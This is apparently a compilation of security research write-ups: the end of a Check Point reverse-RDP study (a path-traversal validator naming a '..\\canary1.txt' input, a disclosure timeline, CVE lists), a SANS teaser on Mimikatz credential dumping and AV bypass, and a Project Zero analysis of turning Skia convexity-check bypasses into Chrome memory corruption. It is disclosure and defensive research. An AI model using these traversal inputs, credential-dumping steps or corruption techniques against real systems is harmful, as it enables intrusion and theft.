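/* Sketch: validate one cFileName field from a received
 * FileGroupDescriptor entry before using it in a "paste". */
static bool fgd_name_is_safe(const char *name) {
    if (name[0] == '\\' || name[0] == '/')      /* absolute path */
        return false;
    if (strchr(name, ':') != NULL)              /* drive letter / ADS */
        return false;
    /* Reject any ".." path component, the ..\canary1.txt trick. */
    for (const char *p = name; (p = strstr(p, "..")) != NULL; p += 2) {
        bool starts = (p == name) || (p[-1] == '\\' || p[-1] == '/');
        bool ends   = (p[2] == '\0') || (p[2] == '\\' || p[2] == '/');
        if (starts && ends)
            return false;
    }
    return true;
}

On Windows, the same intent is usually expressed by canonicalizing the path (for example with PathCanonicalizeA, the API we searched for in vain) and then verifying that the result still lies under the drop folder.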
Note: The content of the synced clipboard is subject to Delayed Rendering. This means that the clipboard’s content is sent over the RDP connection only after a program actively asks for it, usually by clicking “paste”. Until then, the clipboard only holds the list of formats that are available, without holding the content itself.

Disclosure Timeline
16 October 2018 – Vulnerability was disclosed to Microsoft.
22 October 2018 – Vulnerabilities were disclosed to FreeRDP.
22 October 2018 – FreeRDP replied and started working on a patch.
28 October 2018 – Vulnerabilities were disclosed to rdesktop.
5 November 2018 – FreeRDP sent us the patches and asked us to verify them.
18 November 2018 – We verified the patches of FreeRDP and gave them a “green light” to continue.
20 November 2018 – FreeRDP committed the patches to their GitHub as part of 2.0.0-rc4.
17 December 2018 – Microsoft acknowledged our findings. For more information, see Microsoft’s Response.
19 December 2018 – rdesktop sent us the patches and asked us to verify them.
19 December 2018 – We verified the patches of rdesktop and gave them a “green light” to continue.
16 January 2019 – rdesktop committed the patches to their GitHub as part of v1.8.4.

Microsoft’s Response
During the responsible disclosure process, we sent the details of the path traversal in mstsc.exe to Microsoft. This is Microsoft’s official response:
“Thank you for your submission. We determined your finding is valid but does not meet our bar for servicing. For more information, please see the Microsoft Security Servicing Criteria for Windows (https://aka.ms/windowscriteria).”
As a result, this path traversal has no CVE-ID, and there is no patch to address it.

Conclusion
During our research, we found numerous critical vulnerabilities in the tested RDP clients. Although the code quality of the different clients varies, as can be seen by the distribution of the vulnerabilities we found, we argue that the remote desktop protocol is complicated and prone to vulnerabilities. As we demonstrated in our PoCs for both Microsoft’s client and one of the open-source clients, a malicious RDP server can leverage the vulnerabilities in the RDP clients to achieve remote code execution on the client’s computer. As RDP is regularly used by IT staff and technical workers to connect to remote computers, we highly recommend that everyone patch their RDP clients. In addition, due to the nature of the clipboard findings we showed in Microsoft’s RDP client, we recommend that users disable the clipboard sharing channel (on by default) when connecting to a remote machine.

Recommendation for Protection
Check Point recommends the following steps in order to protect against this attack:
Check Point Research worked closely with FreeRDP, rdesktop and Microsoft to mitigate these vulnerabilities. If you are using rdesktop or FreeRDP, update to the latest version, which includes the relevant patches.
When using the Microsoft RDP client (MSTSC), we strongly recommend disabling bi-directional clipboard sharing over RDP.
Apply security measures to both the clients and the servers involved in the RDP communication. Check Point provides various security layers that may be used for protection, such as IPS, SandBlast Agent, Threat Emulation and ANTEX.
Users should avoid using RDP to connect to remote servers that have not implemented sufficient security measures.
Check Point’s IPS blade provides protections against these threats: “FreeRDP Remote Code Execution (CVE-2018-8786)”

Appendix A – CVEs found in rdesktop:
CVE 2018-8791: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function rdpdr_process() that results in an information leak.
CVE 2018-8792: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function cssp_read_tsrequest() that results in a Denial of Service (segfault).
CVE 2018-8793: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function cssp_read_tsrequest() that results in a memory corruption and probably even a remote code execution.
CVE 2018-8794: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to an Out-Of-Bounds Write in function process_bitmap_updates() and results in a memory corruption and possibly even a remote code execution.
CVE 2018-8795: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in function process_bitmap_updates() and results in a memory corruption and probably even a remote code execution.
CVE 2018-8796: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_bitmap_updates() that results in a Denial of Service (segfault).
CVE 2018-8797: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function process_plane() that results in a memory corruption and probably even a remote code execution.
CVE 2018-8798: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function rdpsnd_process_ping() that results in an information leak.
CVE 2018-8799: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_secondary_order() that results in a Denial of Service (segfault).
CVE 2018-8800: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function ui_clip_handle_data() that results in a memory corruption and probably even a remote code execution.
CVE 2018-20174: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function ui_clip_handle_data() that results in an information leak.
CVE 2018-20175: rdesktop versions up to and including v1.8.3 contain several Integer Signedness errors that lead to Out-Of-Bounds Reads in file mcs.c and result in a Denial of Service (segfault).
CVE 2018-20176: rdesktop versions up to and including v1.8.3 contain several Out-Of-Bounds Reads in file secure.c that result in a Denial of Service (segfault).
CVE 2018-20177: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in function rdp_in_unistr() and results in a memory corruption and possibly even a remote code execution.
CVE 2018-20178: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_demand_active() that results in a Denial of Service (segfault).
CVE 2018-20179: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function lspci_process() and results in a memory corruption and probably even a remote code execution.
CVE 2018-20180: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function rdpsnddbg_process() and results in a memory corruption and probably even a remote code execution.
CVE 2018-20181: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function seamless_process() and results in a memory corruption and probably even a remote code execution.
CVE 2018-20182: rdesktop versions up to and including v1.8.3 contain a Buffer Overflow over the global variables in function seamless_process_line() that results in a memory corruption and probably even a remote code execution.

Appendix B – CVEs found in FreeRDP:
CVE 2018-8784: FreeRDP prior to version 2.0.0-rc4 contains a Heap-Based Buffer Overflow in function zgfx_decompress_segment() that results in a memory corruption and probably even a remote code execution.
CVE 2018-8785: FreeRDP prior to version 2.0.0-rc4 contains a Heap-Based Buffer Overflow in function zgfx_decompress() that results in a memory corruption and probably even a remote code execution.
CVE 2018-8786: FreeRDP prior to version 2.0.0-rc4 contains an Integer Truncation that leads to a Heap-Based Buffer Overflow in function update_read_bitmap_update() and results in a memory corruption and probably even a remote code execution.
CVE 2018-8787: FreeRDP prior to version 2.0.0-rc4 contains an Integer Overflow that leads to a Heap-Based Buffer Overflow in function gdi_Bitmap_Decompress() and results in a memory corruption and probably even a remote code execution.
CVE 2018-8788: FreeRDP prior to version 2.0.0-rc4 contains an Out-Of-Bounds Write of up to 4 bytes in function nsc_rle_decode() that results in a memory corruption and possibly even a remote code execution.
CVE 2018-8789: FreeRDP prior to version 2.0.0-rc4 contains several Out-Of-Bounds Reads in the NTLM Authentication module that result in a Denial of Service (segfault).

Source: https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
Mitigations against Mimikatz Style Attacks
Published: 2019-02-05
Last Updated: 2019-02-05 15:26:32 UTC
by Rob VandenBrink (Version: 1)

If you are like me, at some point in most penetration tests you'll have a session on a Windows host, and you'll have an opportunity to dump Windows credentials from that host, usually using Mimikatz. Mimikatz parses credentials (either clear-text or hashes) out of the LSASS process, or at least that's where it started - since its original version back in the day, it has expanded to cover several different attack vectors. An attacker can then use these credentials to "pivot" to attack other resources in the network - this is commonly called "lateral movement", though in many cases you're actually walking "up the tree" to ever-more-valuable targets in the infrastructure.

The defender / blue-teamer (or the blue-team's manager) will often say "this sounds like malware, isn't that what Antivirus is for?". Sadly, this is only half right - malware does use this style of attack. The Emotet strain of malware, for instance, does exactly this; once it gains credentials and persistence, it often passes control to other malware (such as TrickBot or Ryuk). Also sadly, it's been pretty easy to bypass AV on this for some time now - there are a number of well-known bypasses that penetration testers use for the Mimikatz + AV combo, many of them outlined on the BHIS blog: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz

But what about standard Windows mitigations against Mimikatz? Let's start from the beginning: when Mimikatz first came out, Microsoft patched against that first version of the code with KB2871997 (for Windows 7 era hosts, way back in 2014).

Full article: https://isc.sans.edu/diary/rss/24612
Tuesday, February 5, 2019
The Curious Case of Convexity Confusion
Posted by Ivan Fratric, Google Project Zero

Intro
Some time ago, I noticed a tweet about an externally reported vulnerability in the Skia graphics library (used by Chrome, Firefox and Android, among others). The vulnerability caught my attention for several reasons. Firstly, I had looked at Skia before in the context of finding precision issues, and any bug in code I already looked at instantly evokes the “What did I miss?” question in my head. Secondly, the bug was described as a stack-based buffer overflow, and you don’t see many bugs of this type anymore, especially in web browsers. And finally, while the bug itself was found by fuzzing and didn’t contain much in the way of root cause analysis, a part of the fix involved changing the floating point precision from single to double, which is something I argued against in the previous blog post on precision issues in graphics libraries. So I wondered what the root cause was and if the patch really addressed it, or if other variants could be found. As it turned out, there were indeed other variants, resulting in stack and heap out-of-bounds writes in the Chrome renderer.

Geometry for exploit writers
To understand what the issue was, let’s quickly cover some geometry basics we’ll need later. This is all pretty basic stuff, so if you already know some geometry, feel free to skip this section.

A convex polygon is a polygon with the following property: you can take any two points inside the polygon, and if you connect them, the resulting line will be entirely contained within the polygon. A concave polygon is a polygon that is not convex. This is illustrated in the following images:
Image 1: An example of a convex polygon
Image 2: An example of a concave polygon

A polygon is monotone with respect to the Y axis (also called y-monotone) if every horizontal line intersects it at most twice. Another way to describe a y-monotone polygon is: if we traverse the points of the polygon from its topmost to its bottommost point (or the other way around), the y coordinates of the points we encounter are always going to decrease (or always increase) but never alternate directions. This is illustrated by the following examples:
Image 3: An example of a y-monotone polygon
Image 4: An example of a non-y-monotone polygon

A polygon can also be x-monotone if every vertical line intersects it at most twice. A convex polygon is both x- and y-monotone, but the inverse is not true: a monotone polygon can be concave, as illustrated in Image 3. All of the concepts above can easily be extended to other curves, not just polygons (which are made entirely from line segments).

A polygon can be transformed by transforming all of its points. A so-called affine transformation is a combination of scaling, skew and translation (note that affine transformation also includes rotation, because rotation can be expressed as a combination of scale and skew). Affine transformations have the property that, when used to transform a convex shape, the resulting shape must also be convex. For readers with a basic knowledge of linear algebra: a transformation can be represented in the form of a matrix, and the transformed coordinates can be computed by multiplying the matrix with a vector representing the original coordinates. Transformations can be combined by multiplying matrices.
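To make this concrete, here is a minimal sketch in C of a 2D affine transform and how two transforms combine (our own illustration; Skia's actual matrix class is more general):

#include <stdio.h>

/* A 2D affine transform stored as the matrix [a c tx; b d ty; 0 0 1],
 * applied to column vectors. */
typedef struct { double a, b, c, d, tx, ty; } affine_t;

/* Combine two transforms: the result applies n first, then m. */
static affine_t affine_concat(affine_t m, affine_t n) {
    affine_t r = {
        m.a * n.a + m.c * n.b,          /* a */
        m.b * n.a + m.d * n.b,          /* b */
        m.a * n.c + m.c * n.d,          /* c */
        m.b * n.c + m.d * n.d,          /* d */
        m.a * n.tx + m.c * n.ty + m.tx, /* tx */
        m.b * n.tx + m.d * n.ty + m.ty  /* ty */
    };
    return r;
}

/* Transform one point in place. */
static void affine_apply(affine_t m, double *x, double *y) {
    double nx = m.a * *x + m.c * *y + m.tx;
    double ny = m.b * *x + m.d * *y + m.ty;
    *x = nx;
    *y = ny;
}

int main(void) {
    affine_t translate = { 1, 0, 0, 1, 10, 0 };       /* move right by 10 */
    affine_t rotate90  = { 0, 1, -1, 0, 0, 0 };       /* rotate 90 degrees */
    affine_t rt = affine_concat(rotate90, translate); /* translate, then rotate */
    double x = 1, y = 0;
    affine_apply(rt, &x, &y);
    printf("(%f, %f)\n", x, y);  /* prints (0, 11): order matters */
    return 0;
}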
For example, if you multiply a rotation matrix and a translation matrix, you’ll get a transformation matrix that includes both rotation and translation. Depending on the multiplication order, either rotation or translation is going to be applied first.

The bug
Back to the bug: after analyzing it, I found out that it was triggered by a malformed RRect (a rectangle with curved corners, where the user can specify a radius for each corner). In this case, tiny values were used as RRect parameters, which caused precision issues when the RRect was converted into a path object (a more general shape representation in Skia which can consist of both line and curve segments). The result of this was that, after the RRect was converted to a path and transformed, the resulting shape didn’t look like an RRect at all - the resulting shape was concave.

At the same time, Skia assumes that every RRect must be convex, and so, when the RRect is converted to a path, it sets the convexity attribute on the path to kConvex_Convexity (for RRects this happens in a helper class, SkAutoPathBoundsUpdate). Why is this a problem? Because Skia has different drawing algorithms, some of which only work for convex paths. And, unfortunately, using algorithms for drawing convex paths when the path is concave can result in memory corruption. This is exactly what happened here.

Skia developers fixed the bug by addressing RRect-specific computations: they increased the precision of some calculations performed when converting RRects to paths and also made sure that any RRect corner with a tiny radius would be treated as if the radius were 0. Possibly (I haven’t checked), this makes sure that converting an RRect to a path won’t result in a concave shape.

However, another detail caught my attention: initially, when the RRect was converted into a path, it might have been concave, but the concavities were so tiny that they wouldn’t cause any issues when the path was rendered. At some point the path was transformed, which caused the concavities to become more pronounced (the path was very clearly concave at this point). And yet, the path was still treated as convex. How could that be?

The answer: the transformation used was an affine transform, and Skia respects the mathematical property that transforming a shape with an affine transform cannot change its convexity, so when using an affine transform to transform a path, it copies the convexity attribute to the resulting path object. This means: if we can convince Skia that a path is convex, when in reality it is not, and if we apply any affine transform to the path, the resulting path will also be treated as convex. The affine transform can be crafted so that it enlarges, rotates and positions concavities so that, once the convex drawing algorithm is used on the path, memory corruption issues are triggered. Additionally (untested), due to precision errors, computing a transformation itself might introduce tiny concavities where there were none previously. These concavities might then be enlarged in subsequent path transformations.

Unfortunately for computational geometry coders everywhere, accurately determining whether a path is convex in floating point (regardless of whether single or double precision is used) is very difficult, almost impossible to do. So, how does Skia do it?
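Before looking at Skia's answer, it helps to see the textbook approach and why floating point undermines it. The sketch below is our own code, not Skia's:

#include <stdbool.h>
#include <stddef.h>

/* Textbook convexity test: a polygon is convex if consecutive edge
 * cross products never change sign. In 32-bit floats, a concavity
 * small enough that the cross product underflows to 0.0f (or falls
 * inside a tolerance) is invisible to this test - yet an affine
 * transform can later enlarge it arbitrarily. */
typedef struct { float x, y; } pt_t;

bool naive_is_convex(const pt_t *p, size_t n) {
    int sign = 0;
    for (size_t i = 0; i < n; i++) {
        pt_t a = p[i], b = p[(i + 1) % n], c = p[(i + 2) % n];
        float cross = (b.x - a.x) * (c.y - b.y) - (b.y - a.y) * (c.x - b.x);
        if (cross == 0.0f)         /* tiny concavities vanish here */
            continue;
        int s = (cross > 0.0f) ? 1 : -1;
        if (sign == 0)
            sign = s;
        else if (s != sign)        /* direction change: concave */
            return false;
    }
    return true;
}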
Convexity computations in Skia happen in the Convexicator class, where Skia uses several criteria to determine if a path is convex:
It traverses the path and computes changes of direction. For example, if we follow a path and always turn left (or always turn right), the path must be convex.
It checks if the path is both x- and y-monotone.

When analyzing this Convexicator class, I noticed two cases where a concave path might pass as convex:
As can be seen here, any pair of points for which the squared distance does not fit in a 32-bit float (i.e. a distance between the points smaller than ~3.74e-23) will be completely ignored. This, of course, includes sequences of points which form concavities.
Due to tolerances when computing direction changes (e.g. here and here), even concavities significantly larger than 3.74e-23 can easily pass the convexity check (I experimented with values around 1e-10). However, such concavities must also pass the x- and y-monotonicity check.

Note that, in both cases, a path needs to have some larger edges (for which direction can be properly computed) in order to be declared convex, so just having a tiny path is not sufficient. Fortunately, a line is considered convex by Skia, so it is sufficient to have a tiny concave shape and a single point a sufficient distance away from it for a path to be declared convex. Alternatively, by combining both issues above, one can have tiny concavities along the line, which is a technique I used to create paths that are both small and clearly concave when transformed (note: the size of the path is often a factor when determining which algorithms can handle which paths).

To make things clearer, let’s see an example of bypassing the convexity check with a polygon that is both x- and y-monotone. Consider the polygon in Image 5 (a) and imagine that the part inside the red circle is much smaller than depicted. Note that this polygon is concave, but it is also both x-monotone and y-monotone. Thus, if the concavity depicted in the red circle is sufficiently small, the polygon is going to be declared convex. Now, let’s see what we can do with it by applying an affine transform - firstly, we can rotate it and make it non-y-monotone, as depicted in Image 5 (b). Having a polygon that is not y-monotone will be very important for triggering memory corruption issues later. Secondly, we can scale (enlarge) and translate the concavity to fill the whole drawing area, and when the concavity is intersected with the drawing area, we’ll end up with something like what is depicted in Image 5 (c), in which the polygon is clearly concave and the concavity is no longer small.
(a) (b) (c)
Image 5: Bypassing the convexity check with a monotone polygon

The walk_convex_edges algorithm
Now that we can bypass the convexity check in various ways, let’s see how it can lead to problems. To understand this, let’s first examine how Skia's algorithm for drawing (filling) convex paths works (code here). Let’s consider the example in Image 6 (a). The first thing Skia does is extract the polygon (path) lines (edges) and sort them according to the coordinates of the topmost point. The sorting order is top-to-bottom, and if two points have the same y coordinate, the one with the smaller x coordinate goes first. This has been done for the polygon in Image 6 (a), and the numbers next to the edges depict their order. The bottommost edge is ignored because it is fully horizontal and thus not needed (you’ll see why in a moment).
Next, the edges are traversed and the area between them is drawn. First, the first two edges (edges 1 and 2) are taken and the area between them is filled from top to bottom - this is the red area in Image 6 (b). After this, edge 1 is “done” and is replaced by the next edge - edge 3. Now, the area between edge 2 and edge 3 is filled (orange area). Next, edge 2 is “done” and is replaced by the next in line: edge 4. Finally, the area between edges 3 and 4 is rendered. Since there are no more edges, the algorithm stops.
(a) (b)
Image 6: Skia convex path filling algorithm

Note that, in the implementation, the code for rendering areas where both edges are vertical (here) is different from the code for rendering areas where at least one edge is at an angle (here). In the first case, the whole area is rendered in a single call to blitter->blitRect(), while in the second case, the area is rendered line-by-line and blitter->blitH() is called for each line. Of special interest here is the local_top variable, which essentially keeps track of the next y coordinate to fill. In the case of drawing non-vertical edges, it is simply incremented for every line drawn. In the case of vertical lines (drawing a rectangle), after the rectangle is drawn, local_top is set based on the coordinates of the current edge pair. This difference in behavior is going to be useful later.

One interesting observation about this algorithm is that it would work correctly not only for convex paths - it would work correctly for all paths that are y-monotone. Using it for y-monotone paths would also have another benefit: checking if a path is y-monotone could be performed faster and more accurately than checking if a path is convex.

Variant 1
Now, let’s see how drawing concave paths using this algorithm can lead to problems. As the first example, consider the polygon in Image 7 (a) with the edge ordering marked.
(a) (b)
Image 7: An example of a concave path that causes problems in Skia if rendered as convex

Image 7 (b) shows how the shape is rendered. First, a large red area between edges 1 and 2 is rendered. At this point, both edges 1 and 2 are done, and the orange rectangular area between edges 3 and 4 is rendered next. The purpose of this rectangular area is simply to reset the local_top variable to its correct value (here); otherwise local_top would just continue increasing for every line drawn. Next, the green area between edges 3 and 5 is drawn - and this causes problems. Why? Because Skia expects to always draw pixels in top-to-bottom, left-to-right order, e.g. point (x, y) = (1, 1) is always going to be drawn before (1, 2), and (1, 1) is also always going to be drawn before (2, 1). However, in the example above, the area between edges 1 and 2 will have (partially) the same y values as the area between edges 3 and 5. The second area is going to be drawn, well, second, and yet it contains a subset of the same y coordinates and lower x coordinates than the first region.

Now let’s see how this leads to memory corruption. In the original bug, a concave (but presumed convex) path was used as a clipping region (every subsequent draw call draws only inside the clipping region). When setting a path as a clipping region, it also gets “drawn”, but instead of drawing pixels on the screen, they just get saved so they can be intersected with what gets drawn afterwards.
The pixels are saved in SkRgnBuilder::blitH - actually, individual pixels aren't saved; instead, the entire range of pixels (from x to x + width at height y) gets stored at once to save space. These ranges - you guessed it - also depend on the correct drawing order, as can be seen here (among other places).

Now let’s see what happens when a second path is drawn inside a clipping region with incorrect ordering. If antialiasing is turned on when drawing the second path, SkRgnClipBlitter::blitAntiH gets called for every range drawn. This function needs to intersect the clip region ranges with the range being drawn and only output the pixels that are present in both. For that purpose, it gets the clipping ranges that intersect the line being drawn one by one and processes them. SkRegion::Spanerator::next is used to return the next clipping range.

Let’s assume the clipping region for the y coordinate currently drawn has the ranges [start x, end x] = [10, 20] and [0, 2], and the line being drawn is [15, 16]. Let’s also consider the following snippet of code from SkRegion::Spanerator::next:

if (runs[0] >= fRight) {
    fDone = true;
    return false;
}
SkASSERT(runs[1] > fLeft);
if (left) {
    *left = SkMax32(fLeft, runs[0]);
}
if (right) {
    *right = SkMin32(fRight, runs[1]);
}
fRuns = runs + 2;
return true;

where left and right are the output pointers, fLeft and fRight are the left and right x values of the line being drawn (15 and 16, respectively), while runs is a pointer to clipping region ranges that gets incremented for every iteration.

For the first clipping range [10, 20] this is going to work correctly, but let’s see what happens for the range [0, 2]. Firstly, the part

if (runs[0] >= fRight) {
    fDone = true;
    return false;
}

is supposed to stop the algorithm, but due to the incorrect ordering, it does not work (0 >= 16 is false). Next, left is computed as Max(15, 0) = 15 and right as Min(16, 2) = 2. Note how left is larger than right. This results in calling SkAlphaRuns::Break with a negative count argument on the line

SkAlphaRuns::Break((int16_t*)runs, (uint8_t*)aa, left - x, right - left);

which then leads to an out-of-bounds write on the following lines in SkAlphaRuns::Break:

x = count;
...
alpha[x] = alpha[0];

Why did this result in an out-of-bounds write on the stack? Because, in the case of drawing only two pixels, the range arrays passed to SkRgnClipBlitter::blitAntiH and subsequently SkAlphaRuns::Break are allocated on the stack in SkBlitter::blitAntiH2 here.

Triggering the issue in a browser
This is great - we have a stack out-of-bounds write in Skia, but can we trigger this in Chrome? In general, in order to trigger the bug, the following conditions must be met:
We control a path (SkPath) object.
Something must be done to the path object that computes its convexity.
The same path must be transformed and filled / set as a clip region.

My initial idea was to use the CanvasRenderingContext2D API and render a path twice: once without any transform, just to establish its convexity, and a second time with a transformation applied to the CanvasRenderingContext2D object. Unfortunately, this approach won’t work - when drawing a path, Skia is going to copy it before applying a transformation, even if there is effectively no transformation set (the transformation matrix is an identity matrix). So the convexity property is going to be set on a copy of the path, and not the one we get to keep the reference to.
Additionally, Chrome itself makes a copy of the path object when calling any canvas function that causes a path to be drawn, and all the other functions we can call with a path object as an argument do not check its convexity. However, I noticed Chrome canvas still draws my convex/concave paths incorrectly - even if I just draw them once. So what is going on?

As it turns out, when drawing a path using Chrome canvas, the path won’t be drawn immediately. Instead, Chrome just records the draw path operation using RecordPaintCanvas, and all such draw operations will be executed together at a later time. When a DrawPathOp object (representing a path drawing operation) is created, among other things, it is going to check if the path is “slow”, and one of the criteria for this is path convexity:

int DrawPathOp::CountSlowPaths() const {
    if (!flags.isAntiAlias() || path.isConvex())
        return 0;
    …
}

All of this happens before the path is transformed, so we seemingly have a perfect scenario: we control a path, its convexity is checked, and the same path object later gets transformed and rendered.

The second problem with canvas is that, in the previously described approach to converting the issue to memory corruption, we relied on SkRgnBuilder, which is only used when a clip region has antialiasing turned off, while everything in Chrome canvas is going to be drawn with antialiasing on. Chrome also implements the OffscreenCanvas API, which sets clip antialiasing to off (I’m not sure if this is deliberate or a bug), but OffscreenCanvas does not use RecordPaintCanvas and instead draws everything immediately. So the best way forward seemed to be to find some other variants of turning convexity issues into memory corruption, ones that would work with antialiasing on for all operations.

Variant 2
As it happens, Skia implements three different algorithms for path drawing with antialiasing on, and one of these (SkScan::SAAFillPath, using supersampled antialiasing) uses essentially the same filling algorithm we analyzed before. Unfortunately, this does not mean we can get to the same buffer overflow as before - as mentioned, SkRgnBuilder / SkRgnClipBlitter are not used with antialiasing on. However, we have other options.

If we simply fill the path (no clip region needed this time) with the correct algorithm, SuperBlitter::blitH is going to be called without respecting the top-to-bottom, left-to-right drawing order. SuperBlitter::blitH calls SkAlphaRuns::add and, as the last argument, passes the rightmost x coordinate we have drawn so far. This is subtracted from the currently drawn x coordinate on the line

x -= offsetX;

and if x is smaller than something we drew already (for the same y coordinate), it becomes negative. This is, of course, exactly what happens when drawing pixels out of Skia’s expected order. The result is calling SkAlphaRuns::Break with a negative “x” argument.
This skips the entire first part of the function (the “while (x > 0)” loop) and continues to the second part:

runs = next_runs;
alpha = next_alpha;
x = count;

for (;;) {
    int n = runs[0];
    SkASSERT(n > 0);

    if (x < n) {
        alpha[x] = alpha[0];
        runs[0] = SkToS16(x);
        runs[x] = SkToS16(n - x);
        break;
    }
    x -= n;
    if (x <= 0) {
        break;
    }
    runs += n;
    alpha += n;
}

Here, x gets overwritten with count, but the problem is that runs[0] is not going to be initialized (the first part of the function is supposed to initialize it), so in

int n = runs[0];

an uninitialized variable gets read into n and is used as an offset into arrays, which can result in both an out-of-bounds read and an out-of-bounds write when the following lines are executed:

runs += n;
alpha += n;
alpha[x] = alpha[0];
runs[0] = SkToS16(x);
runs[x] = SkToS16(n - x);

The shape needed to trigger this is depicted in Image 8 (a).
(a) (b)
Image 8: Shape used to trigger variant 2 in Chrome

This shape is similar to the one previously depicted, but there are some differences, namely:
We must render two ranges for the same y coordinate immediately one after another, where the second range is to the left of the first range. This is accomplished by making the rectangular area between edges 3 and 4 (orange in Image 8 (b)) less than a pixel wide (so it does not in fact output anything) and making the area between edges 5 and 6 (green in the image) only a single pixel high.
The second range for the same y must not start at x = 0. This is accomplished by edge 5 ending a bit away from the left side of the image bounds.

This variant can be triggered in Chrome by simply drawing a path - the PoC can be seen here.

Variant 3
An uninitialized variable bug in a browser is nice, but not as nice as a stack out-of-bounds write, so I looked for more variants. For the next and final one, the path we need is a bit more complicated and can be seen in Image 9 (a) (note that the path is self-intersecting).
(a) (b)
Image 9: A shape used to trigger a stack buffer overflow in Chrome

Let’s see what happens in this one (assume the same drawing algorithm is used as before):
First, edges 1, 2, 3 and 4 are handled. This part is drawn incorrectly (only the red and orange areas in Image 9 (b) are filled), but the details aren’t relevant for triggering the bug. For now, just note that edges 2 and 4 terminate at the same height, so when they are done, both are replaced with edges 5 and 6.
The purpose of edges 5 and 6 is once again to reset the local_top variable - it will be set to the height shown as the red dotted line in the image.
Now, edges 5 and 6 will both get replaced with edges 7 and 8 - and here is the issue: edges 7 and 8 are not going to be drawn just for the y coordinates between the green and blue lines, as they are supposed to be. Instead, they are going to be rendered all the way from the red line to the blue line.

Note the very low steepness of edges 7 and 8 - for every line, the x coordinates to draw to are going to be significantly increased and, given that the edges are going to be drawn in a larger number of iterations than intended, the x coordinate will eventually spill past the image bounds. This causes a stack out-of-bounds write if a path is drawn using the SkScan::SAAFillPath algorithm with MaskSuperBlitter. MaskSuperBlitter can only handle very small paths (up to 32x32 pixels) and contains a fixed-size buffer that is going to be filled with an 8-bit opacity for each pixel of the path region.
Since MaskSuperBlitter is a local variable in SkScan::SAAFillPath, the (fixed-size) buffer is going to be allocated on the stack. When the path above is drawn, there aren’t any bounds checks on the opacity buffer (there are only debug asserts here and here), which leads to an out-of-bounds write on the stack. Specifically (due to how the opacity buffer works), we can increment values on the stack past the end of the buffer by a small amount. This variant is again triggerable in Chrome by simply drawing a path to the canvas, and it gives us a pretty nice primitive for exploitation - note that this is not a linear overflow, and the offsets involved can be controlled by the slope of edges 7 and 8.

The PoC can be seen here - most of it is just setting up the path coordinates so that the path is initially declared convex and at the same time small enough for MaskSuperBlitter to render it. How to make the shape needed to trigger the bug appear convex to Skia but also fit in 32x32 pixels? Note that the shape is already x-monotone. Now assume we squash it in the y direction until it becomes (almost) a line lying on the x axis. It is still not y-monotone, because there are tiny shifts in the y direction along the line - but if we skew (or rotate) it just a tiny amount, so that it is no longer parallel to the x axis, it also becomes y-monotone. The only parts we can’t make monotone are the vertical edges (edges 5 and 6), but if you squashed the shape sufficiently, they become so short that their squared length does not fit in a float, and they are ignored by the Skia convexity test. This is illustrated in Image 10. In reality these steps need to be followed in reverse, as we start with a shape that needs to pass the Skia convexity test and then transform it into the shape depicted in Image 9.
(a) (b) (c)
Image 10: Making the shape from Image 9 appear convex: (a) original shape, (b) shape after y-scale, (c) shape after y-scale and rotation

On fixing the issue
Initially, Skia developers attempted to fix the issue by not propagating convexity information after the transformation, but only in some cases. Specifically, the convexity was still propagated if the transformation consisted only of scale and translation. Such a fix is insufficient, because very small concavities (where the squared distance between points is too small to fit in a 32-bit float) could still be enlarged using only a scale transformation and could form shapes that would trigger memory corruption issues. After talking to the Skia developers, a stronger patch was created, modifying the convex drawing algorithm in a way that passing concave shapes to it won’t result in memory corruption, but rather in returning from the draw operation early. This patch shipped, along with other improvements, in Chrome 72.

It isn’t uncommon that an initial fix for a vulnerability is insufficient. But the saving grace for Skia, Chrome and most open source projects is that the bug reporter can see the fix immediately when it’s created and point out the potential drawbacks. Unfortunately, this isn’t the case for many closed-source projects, or even open-source projects where the bug fixing process is opaque to the reporter, which has caused mishaps in the past. However, regardless of the vendor, we at Project Zero are happy to receive information on the fixes early and comment on them before they are released to the public.

Conclusion
There are several things worth highlighting about this bug. Firstly, computational geometry is hard. Seriously.
I have some experience with it and, while I can’t say I’m an expert, I know that much at least. Handling all the special cases correctly is a pain, even without considering security issues. And doing it using floating point arithmetic might as well be impossible. If I were writing a graphics library, I would convert floats to fixed-point precision as soon as possible and wouldn’t trust anything computed based on floating-point arithmetic at all.

Secondly, the issue highlights the importance of doing variant analysis - I discovered it based on a public bug report, and other people could have done the same.

Thirdly, it highlights the importance of defense-in-depth. The latest patch makes sure that drawing a concave path with convex path algorithms won’t result in memory corruption, which also addresses unknown variants of convexity issues. If this had been implemented immediately after the initial report, Project Zero would now have one less blog post.

Posted by Ben at 10:08 AM
Source: https://googleprojectzero.blogspot.com/2019/02/the-curious-case-of-convexity-confusion.html
Exploiting SSRF in AWS Elastic Beanstalk
February 1, 2019

In this blog, Sunil Yadav, our lead trainer for the “Advanced Web Hacking” training class, will discuss a case study where a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited to gain access to sensitive data such as the source code. Further, the blog discusses the potential areas which could lead to Remote Code Execution (RCE) on an application deployed on AWS Elastic Beanstalk with a Continuous Deployment (CD) pipeline.

AWS Elastic Beanstalk
